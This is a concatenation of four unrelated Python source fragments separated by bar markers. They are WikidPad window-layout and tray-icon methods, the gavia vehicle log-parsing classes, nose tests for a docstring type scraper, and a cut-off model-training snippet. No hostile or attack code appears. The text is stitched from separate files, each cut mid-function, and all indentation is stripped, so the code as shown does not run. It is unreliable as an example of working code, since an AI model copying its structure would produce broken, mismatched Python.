if self.windowLayouter.containsWindow("time view"):
self.windowLayouter.expandWindow("time view", onOrOff)
if onOrOff:
self.windowLayouter.focusWindow("time view")
else:
if onOrOff:
self.configuration.set("main", "timeView_position", u"2")
layoutCfStr = WindowLayout.calculateMainWindowLayoutCfString(
self.configuration)
self.configuration.set("main", "windowLayout", layoutCfStr)
# Call of changeLayoutByCf() may crash so save
# data beforehand
self.saveCurrentWikiState()
self.changeLayoutByCf(layoutCfStr)
def getStayOnTop(self):
"""
Returns if this window is set to stay on top of all others
"""
return bool(self.GetWindowStyleFlag() & wx.STAY_ON_TOP)
def setStayOnTop(self, onOrOff):
style = self.GetWindowStyleFlag()
if onOrOff:
style |= wx.STAY_ON_TOP
else:
style &= ~wx.STAY_ON_TOP
self.SetWindowStyleFlag(style)
def setShowOnTray(self, onOrOff=None):
"""
Update UI and config according to the settings of onOrOff.
If onOrOff is omitted, UI is updated according to current
setting of the global config
"""
if not onOrOff is None:
self.configuration.set("main", "showontray", onOrOff)
else:
onOrOff = self.configuration.getboolean("main", "showontray")
tooltip = None
if self.getWikiConfigPath(): # If a wiki is open
tooltip = _(u"Wiki: %s") % self.getWikiConfigPath() # self.wikiName
iconName = self.getConfig().get("main", "wiki_icon", u"")
else:
tooltip = u"Wikidpad"
iconName = u""
bmp = None
if iconName != u"":
bmp = wx.GetApp().getIconCache().lookupIcon(iconName)
if onOrOff:
if self.tbIcon is None:
self.tbIcon = TaskBarIcon(self)
if SystemInfo.isLinux():
# On Linux, the tray icon must be resized here, otherwise
# it might be too large.
if bmp is not None:
img = bmp.ConvertToImage()
else:
img = wx.Image(os.path.join(self.wikiAppDir, 'icons',
'pwiki.ico'), wx.BITMAP_TYPE_ICO)
img.Rescale(20, 20)
bmp = wx.BitmapFromImage(img)
icon = wx.IconFromBitmap(bmp)
self.tbIcon.SetIcon(icon, uniToGui(tooltip))
else:
if bmp is not None:
self.tbIcon.SetIcon(wx.IconFromBitmap(bmp),
uniToGui(tooltip))
else:
self.tbIcon.SetIcon(wx.GetApp().standardIcon,
uniToGui(tooltip))
else:
if self.tbIcon is not None:
if self.tbIcon.IsIconInstalled():
self.tbIcon.RemoveIcon()
self.tbIcon.Destroy()
self.tbIcon = None
# # TODO Move to better function
# if bmp is not None:
# self.SetIcon(wx.IconFromBitmap(bmp))
# else:
# print "setShowOnTray25", repr(os.path.join(self.wikiAppDir,
# 'icons', 'pwiki.ico')), repr(wx.Icon(os.path.join(self.wikiAppDir,
# 'icons', 'pwiki.ico'), wx.BITMAP_TYPE_ICO))
# # self.SetIcon(wx.Icon(os.path.join(self.wikiAppDir,
# # 'icons', 'pwiki.ico'), wx.BITMAP_TYPE_ICO))
# self.SetIcon(wx.GetApp().standardIcon)
def setHideUndefined(self, onOrOff=None):
"""
Set if undefined WikiWords should be hidden in the tree
"""
if not onOrOff is None:
self.configuration.set("main", "hideundefined", onOrOff)
else:
onOrOff = self.configuration.getboolean("main", "hideundefined")
# _LAYOUT_WITHOUT_VIEWSTREE = "name:main area panel;"\
# "layout relation:%s&layout relative to:main area panel&name:maintree&"\
# "layout sash position:170&layout sash effective position:170;"\
# "layout relation:below&layout relative to:main area panel&name:log&"\
# "layout sash position:1&layout sash effective position:120"
#
# _LAYOUT_WITH_VIEWSTREE = "name:main area panel;"\
# "layout relation:%s&layout relative to:main area panel&name:maintree&"\
# "layout sash position:170&layout sash effective position:170;"\
# "layout relation:%s&layout relative to:maintree&name:viewstree;"\
# "layout relation:below&layout relative to:main area panel&name:log&"\
# "layout sash position:1&layout sash effective position:120"
def changeLayoutByCf(self, layoutCfStr):
"""
Create a new window layouter according to the
layout configuration string layoutCfStr. Try to reuse and reparent
existing windows.
BUG: Reparenting seems to disturb event handling for tree events and
isn't available for all OS'
"""
# Handle no size events while realizing layout
self.Unbind(wx.EVT_SIZE)
self.windowLayouter.realizeNewLayoutByCf(layoutCfStr)
# self.windowLayouter.realize()
self.windowLayouter.layout()
wx.EVT_SIZE(self, self.OnSize)
self.tree = self.windowLayouter.getWindowByName("maintree")
self.logWindow = self.windowLayouter.getWindowByName("log")
# def getClipboardCatcher(self):
# return self.clipboardCatcher is not None and \
# self.clipboardCatcher.isActive()
def OnClipboardCatcherOff(self, evt):
self.clipboardInterceptor.catchOff()
def OnClipboardCatcherAtPage(self, evt):
if self.isReadOnlyPage():
return
self.clipboardInterceptor.catchAtPage(self.getCurrentDocPage())
def OnClipboardCatcherAtCursor(self, evt):
if self.isReadOnlyPage():
return
self.clipboardInterceptor.catchAtCursor()
def OnUpdateClipboardCatcher(self, evt):
cc = self.clipboardInterceptor
if cc is None:
return # Shouldn't be called anyway
enableCatcher = not self.isReadOnlyPage()
if evt.GetId() == GUI_ID.CMD_CLIPBOARD_CATCHER_OFF:
evt.Check(cc.getMode() == cc.MODE_OFF)
elif evt.GetId() == GUI_ID.CMD_CLIPBOARD_CATCHER_AT_CURSOR:
evt.Enable(enableCatcher)
evt.Check(cc.getMode() == cc.MODE_AT_CURSOR)
elif evt.GetId() == GUI_ID.CMD_CLIPBOARD_CATCHER_AT_PAGE:
evt.Enable(enableCatcher)
if cc.getMode() == cc.MODE_AT_PAGE:
evt.Check(True)
evt.SetText(_(u"Set at Page: %s\t%s") %
(self.clipboardInterceptor.getWikiWord(),
self.keyBindings.CatchClipboardAtPage))
else:
evt.Check(False)
evt.SetText(_(u'Set at Page') + u'\t' +
self.keyBindings.CatchClipboardAtPage)
def writeGlobalConfig(self):
"writes out the global config file"
try:
self.configuration.save()
except (IOError, OSError, DbAccessError), e:
self.lostAccess(e)
raise
except Exception, e:
self.displayErrorMessage(_(u"Error saving global configuration"), e)
def writeCurrentConfig(self):
"writes out the current config file"
try:
self.configuration.save()
except (IOError, OSError, DbAccessError), e:
self.lostAccess(e)
raise
except Exception, e:
self.displayErrorMessage(_(u"Error saving current configuration"), e)
def showWikiWordOpenDialog(self):
AdditionalDialogs.OpenWikiWordDialog.runModal(self, self, -1)
# dlg = OpenWikiWordDialog(self, -1)
# try:
# dlg.CenterOnParent(wx.BOTH)
# dlg.ShowModal()
self.getActiveEditor().SetFocus()
# finally:
# dlg.Destroy()
def showWikiWordRenameDialog(self, wikiWord=None):
if wikiWord is None:
wikiWord = self.getCurrentWikiWord()
if wikiWord is not None:
wikiWord = self.getWikiDocument().getWikiPageNameForLinkTerm(wikiWord)
if wikiWord is None:
self.displayErrorMessage(_(u"No real wiki word selected to rename"))
return
if wikiWord == u"ScratchPad":
self.displayErrorMessage(_(u"The scratch pad cannot be renamed."))
return
if self.isReadOnlyPage():
return
AdditionalDialogs.RenameWikiWordDialog.runModal(self, wikiWord, self, -1)
return
# dlg = wx.TextEntryDialog(self, uniToGui(_(u"Rename '%s' to:") %
# wikiWord), _(u"Rename Wiki Word"), wikiWord, wx.OK | wx.CANCEL)
#
# try:
# while dlg.ShowModal() == wx.ID_OK and \
# not self.showWikiWordRenameConfirmDialog(wikiWord,
# guiToUni(dlg.GetValue())):
# pass
#
# finally:
# dlg.Destroy()
# TODO Unicode
def showStoreVersionDialog(self):
dlg = wx.TextEntryDialog (self, _(u"Description:"),
_(u"Store new version"), u"",
wx.OK | wx.CANCEL)
description = None
if dlg.ShowModal() == wx.ID_OK:
description = dlg.GetValue()
dlg.Destroy()
if not description is None:
self.saveAllDocPages()
| |
import os
import pandas as pd
import gavia.time as gavtime
from gavia.version import __version__
import sys
def getlogs(dir,logtype):
'''
get list of logs for camera
'''
files = []
loglist = os.listdir(dir)
for log in loglist:
if logtype in log:
files.append(log)
# for gps, remove gpsfix
if logtype =='gps':
delfiles = []
for i in range(len(files)):
if 'gpsfix' in files[i]: delfiles.append(files[i])
for f in delfiles:
del files[files.index(f)]
return sorted(files)
def parsedatetime(dateNtime):
'''
example: 2019 04 16 10:59:20.619
'''
# year,month,day,time = dateNtime.split(' ') # this doesn't always work
# hour,minute,secondsNmilli = time.split(':')
# second,millisecond = secondsNmilli.split('.')
year = dateNtime[0:4]
month = dateNtime[5:7]
day = dateNtime[8:10]
hour = dateNtime[11:13]
minute = dateNtime[14:16]
second = dateNtime[17:19]
millisecond = dateNtime[20:23]
return int(year),int(month),int(day),int(hour),int(minute),int(second),int(millisecond)
def matchmerge(df1,df1time,df2,df2time,df1cols=[None], df2cols=[None],df3=None,df3cols=[None], df3time=None):
'''
Match multiple log files by specified time header such as epoch time.
If an exact match does not exist, use the closest sample entry.
Parameters
----------
df1 : DataFrame
DataFrame to add to from other DataFrames
dftime : string
Column header in df1 used to match time of sample, this cannot be removed
even if it is not contained in df1cols
df2 : DataFrame
DataFrame with entries to add to df1 according to closest matching time entry
df1cols : list of strings
List of strings containing df1 headers to keep in the DataFrame, Default [None]
keeps all columns
Returns
-------
Modified df1 DataFrame with data from df2 (and df3 if df3 is a valid dataframe)
'''
# Assign headers for new DataFrame
if None in df1cols: df1cols = list(df1)
if None in df2cols: df2cols = list(df2)
if ((df3 is not None) and (None in df3cols)):df3cols = list(df3)
if ((df3 is not None) and (df3time == None)): raise ValueError('Need to specify df3time when using df3 parameter')
# Remove 'software_name', 'software_version', 'software_url' from df1cols
for h in range(len(df1cols)):
if df1cols[h] in ['software_name', 'software_version', 'software_url']:
del df1cols[h]
dfmcols = df1cols.copy()
# add any aditional values and remove any replicates from df2cols
dellist = []
for x in range(len(df2cols)): # change to one-liner
if ((df2cols[x] not in dfmcols) and (df2cols[x] not in ['software_name', 'software_version', 'software_url'])):
dfmcols.append(df2cols[x])
else:
dellist.append(df2cols[x])
# remove replicates from df2
for i in dellist:
del df2cols[df2cols.index(i)]
# add any aditional values and remove any replicates from df3cols if used
if df3 is not None:
dellist = []
for x in range(len(df3cols)): # change to one-liner
if ((df3cols[x] not in dfmcols) and (df3cols[x] not in ['software_name', 'software_version', 'software_url'])):
dfmcols.append(df3cols[x])
else:
dellist.append(df3cols[x])
# remove replicates from df2
for i in dellist:
del df3cols[df3cols.index(i)]
# Add 'software_name', 'software_version', 'software_url' from dfmcols
dfmcols.extend(['software_name', 'software_version', 'software_url'])
# New DataFrame
dfm = pd.DataFrame(columns=dfmcols)
for i in range(len(df1)):
row = []
if pd.isna(df1.loc[i][df1time]): continue # skip nan values
# Add to row from df1
for df1_head in df1cols:
row.append(df1.loc[i][df1_head])
# df2 - index of smallest difference
df2idx = abs(df2[df2time] - df1.loc[i][df1time]).sort_values().index[0]
# Add to row from df2
for df2_head in df2cols:
row.append(df2.loc[df2idx][df2_head])
if df3 is not None:
# df3 - index of smallest difference
df3idx = abs(df3[df3time] - df1.loc[i][df1time]).sort_values().index[0]
# Add to row from df3
for df3_head in df3cols:
row.append(df3.loc[df3idx][df3_head])
# Add 'software_name', 'software_version', 'software_url' to row
row.extend(['gavia',__version__,'github.com/brett-hosking/gavia'])
# Add row to dataframe
dfm.loc[len(dfm)] = row
return dfm
def timeshift(df,shift):
'''
Introduce a time shift (in seconds) in log file and recalculate
human-readbale times.
Parameters
----------
df : DataFrame
gavia log with timestamp header and values given in seconds
shift : float
time shift in seconds
Returns
-------
New log as a DataFrame with adjusted time fields
'''
headers = list(df)
if 'timestamp' not in headers:raise ValueError('not a valid gavia logfile; the log should contain a timestamp header')
# Shift the timestamp header
df['timestamp'] = df['timestamp'] + shift
if 'capture-time' in headers:
# Shift the timestamp header
df['capture-time'] = df['capture-time'] + shift
# New DataFrame
dfc = pd.DataFrame(columns=headers)
# update human readable times
for i in range(len(df)):
row = []
if pd.isna(df.loc[i]['timestamp']):
row = df.loc[i].values.tolist()
else:
row = df.loc[i].values.tolist()
row[headers.index('timestamp_epoch')],row[headers.index('timestamp_nano')] = str(df.iloc[i]['timestamp']).split('.')
row[headers.index('time')] = gavtime.epoch2dtimeformat(df.iloc[i]['timestamp'])
row[headers.index('year')],row[headers.index('month')],row[headers.index('day')],row[headers.index('hour')],row[headers.index('minute')],row[headers.index('second')],row[headers.index('millisecond')] = parsedatetime(row[headers.index('time')])
if 'capture-time' in headers:
if not pd.isna(df.loc[i]['capture-time']):
row[headers.index('capture_epoch')],row[headers.index('capture_micro')] = str(df.iloc[i]['capture-time']).split('.')
capture_dtime = gavtime.epoch2datetime(row[headers.index('capture_epoch')])
row[headers.index('capture_year')] = capture_dtime[0]
row[headers.index('capture_month')] = capture_dtime[1]
row[headers.index('capture_day')] = capture_dtime[2]
row[headers.index('capture_hour')] = capture_dtime[3]
row[headers.index('capture_minute')] = capture_dtime[4]
row[headers.index('capture_second')] = capture_dtime[5]
# Add row to new DataFrame
dfc.loc[i] = row
return dfc
class GPS:
def __init__(self):
self.df = pd.DataFrame(columns=self.headers())
def save(self,path):
self.df.to_csv(path)
def init_dict(self):
return { 'timestamp': None,
'time': None,
'UTC': None,
'cogt':None,
'diff-age': None,
'hdop': None,
'lat': None,
'lat-dev': None,
'lon':None,
'lon-dev':None,
'messages-received':None,
'quality': None,
'raw-logged-bytes': None,
'received-telnet-bytes':None,
'sats':None,
'sent-corr-bytes':None,
'sent-corr-packets':None,
'sent-telnet-bytes':None,
'sogk':None,
'sogm':None,
'stnRef':None,
'time-since-sent':None
}
def addrow( self,
timestamp=None,
timestamp_epoch=None,
timestamp_nano=None,
time=None,
year=None,
month=None,
day=None,
hour=None,
minute=None,
second=None,
millisecond=None,
UTC=None,
cogt=None,
diff_age=None,
hdop=None,
lat=None,
lat_dev=None,
lon=None,
lon_dev=None,
messages_received=None,
quality=None,
raw_logged_bytes=None,
received_telnet_bytes=None,
sats=None,
sent_corr_bytes=None,
sent_corr_packets=None,
sent_telnet_bytes=None,
sogk=None,
sogm=None,
stnRef=None,
time_since_sent=None,
software_name='gavia',
software_version=__version__,
software_url='github.com/brett-hosking/gavia'
):
self.df.loc[len(self.df)] = [
timestamp,
timestamp_epoch,
timestamp_nano,
time,
year,
month,
day,
hour,
minute,
second,
millisecond,
UTC,
cogt,
diff_age,
hdop,
lat,
lat_dev,
lon,
lon_dev,
messages_received,
quality,
raw_logged_bytes,
received_telnet_bytes,
sats,
sent_corr_bytes,
sent_corr_packets,
sent_telnet_bytes,
sogk,
sogm,
stnRef,
time_since_sent,
software_name,
software_version,
software_url
]
def headers(self):
return [
'timestamp',
'timestamp_epoch',
'timestamp_nano',
'time',
'year',
'month',
'day',
'hour',
'minute',
'second',
'millisecond',
'UTC',
'cogt',
'diff_age',
'hdop',
'lat',
'lat_dev',
'lon',
'lon_dev',
'messages_received',
'quality',
'raw_logged_bytes',
'received_telnet_bytes',
'sats',
'sent_corr_bytes',
'sent_corr_packets',
'sent_telnet_bytes',
'sogk',
'sogm',
'stnRef',
'time_since_sent',
'software_name',
'software_version',
'software_url'
]
class Camera:
def __init__(self):
self.df = pd.DataFrame(columns=self.headers())
def save(self,path):
self.df.to_csv(path)
def init_dict(self):
return { 'timestamp': None,
'time': None,
'capture-time': None,
'clock-drift': None,
'delivered-frame-rate': None,
'frame-drop-count': None,
'frame-loss-percentage': None,
'frames-captured':None,
'frames-written': None,
'pc-time':None,
'process-in-Q':None,
'process-out-Q':None,
'process-pop-q-size':None,
'build-number':None,
'build-tag':None,
'strobe-pin':None,
'mode':None,
'framerate':None,
'bayer_filter':None,
'port':None,
'host_interface':None,
'shutter_auto':None,
'shutter_max':None,
'shutter_min':None,
'shutter':None,
'gain_auto':None,
'gain_max':None,
'gain_min':None,
'gain':None,
'exposure':None,
'whitebalance_auto':None,
'whitebalance_bu':None,
'whitebalance_rv':None,
'path':None,
'save_raw':None,
'jpeg_quality':None,
'manipthreads':None,
'img_q_size':None,
'frame_drop_interval':None,
'exposure_test':None,
'abort_data_timeout':None,
'software_name':'gavia',
'software_version':__version__,
'software_url':'github.com/brett-hosking/gavia'}
def addrow( self,
timestamp=None,
timestamp_epoch=None,
timestamp_nano=None,
time=None,
year=None,
month=None,
day=None,
hour=None,
minute=None,
second=None,
millisecond=None,
filepath=None,
filename=None,
capture_time=None,
capture_epoch=None,
capture_year=None,
capture_month=None,
capture_day=None,
capture_hour=None,
capture_minute=None,
capture_second=None,
capture_micro=None,
clock_drift=None,
delivered_frame_rate=None,
frame_drop_count=None,
frame_loss_percentage=None,
frames_captured=None,
frames_written=None,
pc_time=None,
process_in_Q=None,
process_out_Q=None,
process_pop_q_size=None,
build_number=None,
build_tag=None,
strobe_pin=None,
mode=None,
framerate=None,
bayer_filter=None,
port=None,
host_interface=None,
shutter_auto=None,
shutter_max=None,
shutter_min=None,
shutter=None,
gain_auto=None,
gain_max=None,
gain_min=None,
gain=None,
exposure=None,
whitebalance_auto=None,
whitebalance_bu=None,
whitebalance_rv=None,
path=None,
save_raw=None,
jpeg_quality=None,
manipthreads=None,
img_q_size=None,
frame_drop_interval=None,
exposure_test=None,
abort_data_timeout=None,
software_name='gavia',
software_version=__version__,
software_url='github.com/brett-hosking/gavia'
):
self.df.loc[len(self.df)] = [
timestamp,
timestamp_epoch,
timestamp_nano,
time,
year,
month,
day,
hour,
minute,
second,
millisecond,
filepath,
filename,
capture_time,
capture_epoch,
capture_year,
capture_month,
capture_day,
capture_hour,
capture_minute,
capture_second,
capture_micro,
clock_drift,
delivered_frame_rate,
frame_drop_count,
frame_loss_percentage,
frames_captured,
frames_written,
pc_time,
process_in_Q,
process_out_Q,
process_pop_q_size,
build_number,
build_tag,
strobe_pin,
mode,
framerate,
bayer_filter,
port,
host_interface,
shutter_auto,
shutter_max,
shutter_min,
shutter,
gain_auto,
gain_max,
gain_min,
gain,
exposure,
whitebalance_auto,
whitebalance_bu,
whitebalance_rv,
path,
save_raw,
jpeg_quality,
manipthreads,
img_q_size,
frame_drop_interval,
exposure_test,
abort_data_timeout,
software_name,
software_version,
software_url
]
def headers(self):
return [
'timestamp',
'timestamp_epoch',
'timestamp_nano',
'time',
'year',
'month',
'day',
'hour',
'minute',
'second',
'millisecond',
'filepath',
'filename',
'capture-time',
'capture_epoch',
'capture_year',
'capture_month',
'capture_day',
'capture_hour',
'capture_minute',
'capture_second',
'capture_micro',
'clock-drift',
'delivered-frame-rate',
'frame-drop-count',
'frame-loss-percentage',
'frames-captured',
'frames-written',
'pc-time',
'process-in-Q',
'process-out-Q',
'process-pop-q-size',
'build-number',
'build-tag',
'strobe-pin',
'mode',
'framerate',
'bayer_filter',
'port',
'host_interface',
'shutter_auto',
'shutter_max',
'shutter_min',
'shutter',
'gain_auto',
'gain_max',
'gain_min',
'gain',
'exposure',
'whitebalance_auto',
'whitebalance_bu',
'whitebalance_rv',
'path',
'save_raw',
'jpeg_quality',
'manipthreads',
'img_q_size',
'frame_drop_interval',
'exposure_test',
'abort_data_timeout',
'software_name',
'software_version',
'software_url']
class Navigator:
def __init__(self):
self.df = pd.DataFrame(columns=self.headers())
def save(self,path):
self.df.to_csv(path)
def init_deadreckoning_dict(self):
'''
dead-reckoning-orientation
dead-reckoning-velocity
dead-reckoning-position
dead-reckoning-variance
'''
return { 'heading':None,
'pitch':None,
'roll':None,
'heave':None,
'surge':None,
'sway':None,
'lat':None,
'lon':None,
'var_lat':None,
'var_lat_lon':None,
'var_lon':None
}
def init_orientation_dict(self):
'''
orientation
'''
return { 'heading':None,
'pitch':None,
'roll':None
}
def init_variance_dict(self):
'''
Variance
'''
return { 'var_lat':None,
'var_lat_lon':None,
'var_lon':None
}
def init_position_dict(self):
'''
Position
'''
return { 'depth':None,
'lat':None,
'lon':None
}
def init_velocity_dict(self):
'''
Velocity
'''
return { 'heave':None,
'surge':None,
'sway':None
}
def init_dict(self):
return { 'timestamp': None,
'time': None,
'build-number':None,
'build-tag':None,
'calculate-magnetic-deviation':None,
'magnetic-deviation':None,
'pressure-timeout':None,
'compass-timeout':None,
'dead-reckoning-sog-timeout':None,
'dvl-timeout':None,
'gps-timeout':None,
'gps-validation-enabled':None,
'veto-use-water-velocity':None,
'station-keeping-enabled':None,
'sound-velocity-timeout':None,
'temperature-timeout':None,
'seanav-timeout':None,
'use-pressure':None,
'max-allowed-variance':None,
'variance-exceeded-warning-level':None,
'lat-lon-precision':None,
'max-dead-reckoning-distance':None,
'dead-reckoning-distance':None,
'pressure-depth-conversion':None,
'average-water-density':None,
'use-water-velocity':None,
'sound-velocity':None,
'temperature':None,
'density-abort-limit':None,
'gps-variance':None,
'lbl-variance':None,
'revolutions-bias':None,
'revolutions-scale':None,
'dvl-bias':None,
'dvl-scale':None,
'gyro-bias':None,
'control-rate':None,
'motor-default':None,
'stationary-radius':None,
'stationary-p':None,
'stationary-idle':None,
'stationary-depth-timeout':None,
'estimate-speed':None,
'observe-timer-on':None,
'predict-timer-on':None,
'binary-log':None,
'broadcast-interface':None,
'broadcast-enable':None,
'broadcast-frequency':None,
'broadcast-navigation-message':None,
'broadcast-depth-message':None,
'broadcast-sound-velocity-message':None,
'idle-status':None,
'maxWarningLevel':None,
'pilot-status':None,
| |
# ######################################################################
# Copyright (c) 2014, Brookhaven Science Associates, Brookhaven #
# National Laboratory. All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions #
# are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of the Brookhaven Science Associates, Brookhaven #
# National Laboratory nor the names of its contributors may be used #
# to endorse or promote products derived from this software without #
# specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE #
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, #
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES #
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR #
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) #
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, #
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OTHERWISE) ARISING #
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
########################################################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from itertools import product
import six
import logging
logger = logging.getLogger(__name__)
from vttools import scrape
from numpy.testing import assert_string_equal, assert_equal, assert_raises
from nose.tools import assert_true
from scrape_test_source import eat_porridge, porridge_for_the_bears, has_defaults
def test_scrape():
res = scrape.scrape_function('porridge_for_the_bears', __name__)
for k in ('input_ports', 'output_ports', 'doc_string',
'f_type', 'func_name', 'module_path'):
assert_true(k in res)
def test_enum():
res = scrape.scrape_function('has_defaults', __name__)
assert_equal(res['input_ports'][-1]['values'], has_defaults.e)
def test_obj_src():
string_result = scrape.obj_src(eat_porridge)
initial_txt_should_be = str(
'def eat_porridge(this_sucks, temperature, wtf):')
initial_txt_actual = str(string_result.split('\n')[0])
assert_string_equal(initial_txt_actual, initial_txt_should_be)
def _optional_test_helper(tst, tar):
assert_equal(scrape._type_optional(tst)[1], tar)
def test_type_optional():
test_string = ('array, optional', 'array', 'array (optional)')
targets = (True, False, True)
for tst, tar in zip(test_string, targets):
yield _optional_test_helper, tst, tar
def test_stacked_output_port():
res = scrape.scrape_function('porridge_for_the_bears', __name__)
assert_equal(3, len(res['output_ports']))
def test_enum_type():
"""
Example function docstrings:
1) numpy.linalg.svd()
Parameters :
a : (..., M, N) array_like
A real or complex matrix of shape (M, N) .
full_matrices : bool, optional
If True (default), u and v have the shapes (M, M) and (N, N),
respectively. Otherwise, the shapes are (M, K) and (K, N),
respectively, where K = min(M, N).
compute_uv : bool, optional
Whether or not to compute u and v in addition to s. True by
default.
Returns :
u : { (..., M, M), (..., M, K) } array
Unitary matrices. The actual shape depends on the value of
full_matrices. Only returned when compute_uv is True.
s : (..., K) array
The singular values for every matrix, sorted in descending
order.
v : { (..., N, N), (..., K, N) } array
Unitary matrices. The actual shape depends on the value of
full_matrices. Only returned when compute_uv is True.
"""
test_str1 = '{True, False, Maybe}'
test_str2 = 'array'
test_str3 = '{true, FALSE, 452}'
test_str4 = '{12.5, 5.3}'
test_str5 = '{ (..., M, M), (..., M, K) } array'
test_str6 = '{ (..., N, N), (..., K, N) } array'
assert_equal(scrape._enum_type(test_str1)[1], True)
assert_equal(scrape._enum_type(test_str1)[2], ['True', 'False',
'Maybe'])
assert_equal(scrape._enum_type(test_str2)[1], False)
assert_raises(ValueError, scrape._enum_type, test_str3)
assert_raises(ValueError, scrape._enum_type, test_str4)
assert_equal(scrape._enum_type(test_str5)[1], True)
assert_equal(scrape._enum_type(test_str6)[1], True)
object_type_strings = ('any', 'object')
array_type_strings = ('array', 'array-like', 'array_like', 'array like',
'Array', 'ndarray', 'ndarray-like', '(N, ) array',
'(N, Maoeu, 8) array', '(,) array', '(, ) array',
'np.array', 'np.ndarray', '(N, M, P) array',
'(..., K) array',
'(..., M, N) array_like', '(N, M, P) ndarray',
'(M,) array_like', '(M) array_like', 'MxN array',
'array_like, shape (M, N)', 'ndarray, float', 'ndarrays',
'2D array', '2-D array',
'array_like (1-D)', 'array_like (1D or 2D)',
'array_like (cast to booleans)',
'int or [int, int] or array-like or [array, array]',
'array_likes')
matrix_type_strings = (tuple('{}matrix'.format(p)
for p in ('np.', 'numpy.', '')) +
('(N, M) matrix', ))
list_type_strings = ('list', 'List', 'list-like', 'list_like',
'list like', 'listlike')
tuple_type_strings = ('tuple'),
seq_type_strings = ('sequence', '1D sequence', '1-D sequence')
dtype_type_strings = ('dtype', 'dtype like', 'np.dtype', 'numpy.dtype',
'data-type', 'data type', 'data type code',
'dtype specifier',
'numpy dtype')
bool_type_strings = ('bool', 'boolean')
file_type_strings = ('file', 'filename', 'file handle',
'file object', 'file handle object')
scalar_type_strings = ('scalar', 'number')
float_type_strings = (tuple('{}float{}'.format(prefix, n)
for prefix, n in product(('np.', 'numpy.', ''),
(16, 32, 64, 128)))
+ ('double', 'single', 'float', 'float (only if)'))
# known fails 'int (cast to 0 or 1)',
int_type_strings = (('integer', 'InTeGeR',) +
tuple('{}{}int{}'.format(prefix, u, n)
for prefix, u, n
in product(('np.', 'numpy.', ''),
('u', ''),
(8, 16, 32, 64))))
complex_type_strings = ('complex', )
dict_type_strings = ('dict', 'dictionary')
str_type_strings = ('str', 'string', 'str-like')
callable_type_strings = ('function', 'func', 'callable',
'callable f(x,*args)', 'function(x) -> f')
def test_normalize_simple():
# Example function docstrings:
# 1) numpy.outer()
# Parameters :
# a : (M,) array_like
# First input vector. Input is flattened if not already
# 1-dimensional.
# b : (N,) array_like
# Second input vector. Input is flattened if not already
# 1-dimensional.
# Returns :
# out : (M, N) ndarray
# 2) numpy.linalg.svd()
# Parameters :
# a : (..., M, N) array_like
# A real or complex matrix of shape (M, N) .
# full_matrices : bool, optional
# If True (default), u and v have the shapes (M, M) and (N, N),
# respectively. Otherwise, the shapes are (M, K) and (K, N),
# respectively, where K = min(M, N).
# compute_uv : bool, optional
# Whether or not to compute u and v in addition to s. True by
# default.
# Returns :
# u : { (..., M, M), (..., M, K) } array
# Unitary matrices. The actual shape depends on the value of
# full_matrices. Only returned when compute_uv is True.
# s : (..., K) array
# The singular values for every matrix, sorted in descending
# order.
# v : { (..., N, N), (..., K, N) } array
# Unitary matrices. The actual shape depends on the value of
# full_matrices. Only returned when compute_uv is True.
test_dict = {
'object': object_type_strings,
'array': array_type_strings,
'matrix': matrix_type_strings,
'list': list_type_strings,
'tuple': tuple_type_strings,
'seq': seq_type_strings,
'dtype': dtype_type_strings,
'bool': bool_type_strings,
'file': file_type_strings,
'scalar': scalar_type_strings,
'float': float_type_strings,
'int': int_type_strings,
'complex': complex_type_strings,
'dict': dict_type_strings,
'str': str_type_strings,
'callable': callable_type_strings,
}
# make sure we test everything!
test_keys = set(six.iterkeys(test_dict))
sig_keys = set(six.iterkeys(scrape.sig_map))
assert_equal(test_keys, sig_keys)
for k, v in six.iteritems(test_dict):
for ts in v:
yield _normalize_test_helper, ts, k
def _normalize_test_helper(tst, targ):
assert_equal(scrape._normalize_type(tst), targ)
def test_check_alt_types():
test_strings = ('float or int',
'scalar or tuple of scalars',
'int or scalar',
'scalar or sequence of scalars',
'MxN ndarray',
'integer value',
'aardvark',
'aardvark of doom',
'list or aardavrk',
'aardvark or integer'
)
targets = ('float',
'tuple',
'scalar',
'seq',
'array',
'int',
None,
None,
'list',
'int')
for ts, tar in zip(test_strings, targets):
yield _normalize_test_helper, ts, tar,
def test_truncate_description():
original_description1 = ['length of three']
original_description2 = ['This object is the original description '
'stripped from the doc string. The object is ',
'actually a list of strings.']
word_count = 6
# Test to make sure descriptions that are smaller than the
# specified word count pass through correctly
assert_equal(scrape._truncate_description(original_description1,
word_count),
'length of three')
# Test that function descriptions less than word_count are cropped and
# passed through correctly
assert_equal(scrape._truncate_description(original_description2,
word_count),
'This object is the original description')
def _func_helper(func, test_string, expected_string):
assert_equal(func(test_string), expected_string)
def test_guess_type():
"""
The function _guess_type() is used in the function _enum_type(). The
initial input is the stripped type string.
e.g. {14, 0.333, 5j, True, False, Maybe}
The input string is then checked to make sure that there are enclosing
curly braces, after which the enum string is separated out using the
commas, any string declarations are then removed (i.e. ' or "), and each
element of the original | |
self.args.output_dir
self._move_model_to_device()
if "train_document" in self.extra_args and self.extra_args["train_document"] == True:
train_dataset = DocumentDataset(
self.tokenizer,
self.args,
train_file,
self.args.block_size,
2,
sliding_window=self.args.sliding_window)
